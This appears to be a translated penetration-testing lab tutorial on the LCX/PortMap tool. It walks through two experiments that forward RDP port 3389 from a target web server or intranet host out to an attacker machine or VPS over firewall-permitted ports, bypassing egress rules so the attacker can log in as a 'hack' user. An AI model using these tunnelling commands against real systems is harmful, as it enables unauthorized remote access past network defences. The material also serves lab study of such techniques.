LCX port forwarding
Introduction to LCX
LCX is a port forwarding tool, divided into Windows version and Linux version, and the Linux version is PortMap. LCX has two functions of port mapping and port forwarding. For example, when the target's 3389 port is only open to the inside and not to the outside world, port mapping can be used to map the 3389 port to other ports of the target; when the target is in the internal network or the target configuration When the policy only allows access to a fixed port, the restriction can be broken through port forwarding.
LCX usage for Windows:
端口转发:
Lcx -listen <监听slave请求的端口><等待连接的端口>
Lcx -slave <攻击机IP><监听端口><目标IP><目标端口>
端口映射:
Lcx -tran<等待连接的端口><目标IP><日标端口>
LCX usage for Linux:
Usage:./portmap -m method [-h1 host1] -p1 port1 [-h2 host2] -p2 port2 [-v] [-log
filename]
-v: version
-h1: host1
-h2: host2
-p1: port1
-p2: port2
-log: log the data
-m: the action method for this tool
1: listen on PORT1 and connect to HOST2:PORT2
2: listen on PORT1 and PORT2
3: connect to HOST1:PORT1 and HOST2:PORT2
LCX experiment one
1. Experimental scene
Since the firewall is configured to only allow web access, at this time the attacker wants to access port 3389, and the remote connection is not possible, so LCX needs to be used for port forwarding
The web server has opened port 80, and port 3389 is not allowed to go out of the network. You can forward port 3389 of the web server to port 53, which is allowed to go out of the network. At this time, the attacker listens to port 53 locally and forwards it to port 1111. At this time, the attacker connects Your own port 1111 is equal to port 3389 for accessing the web server
2. Experimental environment
The machine is introduced as follows
| Machine name | Machine IP |
|---|---|
| attack machine | 192.168.198.129 |
| web server | 192.168.198.128 |
3. Experimental reproduction
1. Run the following command on the attacking machine, listen to the local port 53 and forward it to the local port 1111
lcx.exe -listen 53 1111
2. Run the following command on the web target machine to forward the local port 3389 to port 53 of 192.168.198.129
lcx.exe -slave 192.168.198.129 53 127.0.0.1 3389
3. Run the remote desktop on the attacking machine, the address is 127.0.0.1:1111, enter the credentials
4. You can use 3389 to remotely connect to the web server at 192.168.198.128
5. As shown in the figure, successfully use the hack user to remotely log in to the Web server
LCX experiment two
1. Experimental scene
The intranet target machine has opened port 80, and port 3389 is not allowed to go out of the network. You can forward port 3389 of the intranet target machine to port 54, which is allowed to go out of the network. At this time, the attacker listens to port 54 on the VPS and forwards it to port 1111. When the attacker connects to port 1111 of the VPS, it is equal to accessing port 3389 of the intranet target machine
2. Experimental environment
| Machine name | Machine IP |
|---|---|
| Attacker VPS | 192.168.0.114 |
| Intranet attacker machine | 192.168.198.129 |
| Intranet target machine | 192.168.164.128 |
3. Experimental reproduction
1. Run the following command on the intranet target machine, listen to the local port 3389 and forward it to port 54 of the VPS
lcx.exe -slave 192.168.0.114 54 127.0.0.1 3389
2. Run lcx.exe -listen 54 1111 on vps, because my vps machine is a kali system, so I use portmap
./portmap -m 2 -p1 54 -p2 1111
3. Connect to the 192.168.0.114:1111 port on the intranet attacker machine, and enter the account password credentials
4. You can remotely access port 3389 of the intranet target machine
5. As shown in the figure, successfully use the hack user to remotely log in to the Web server
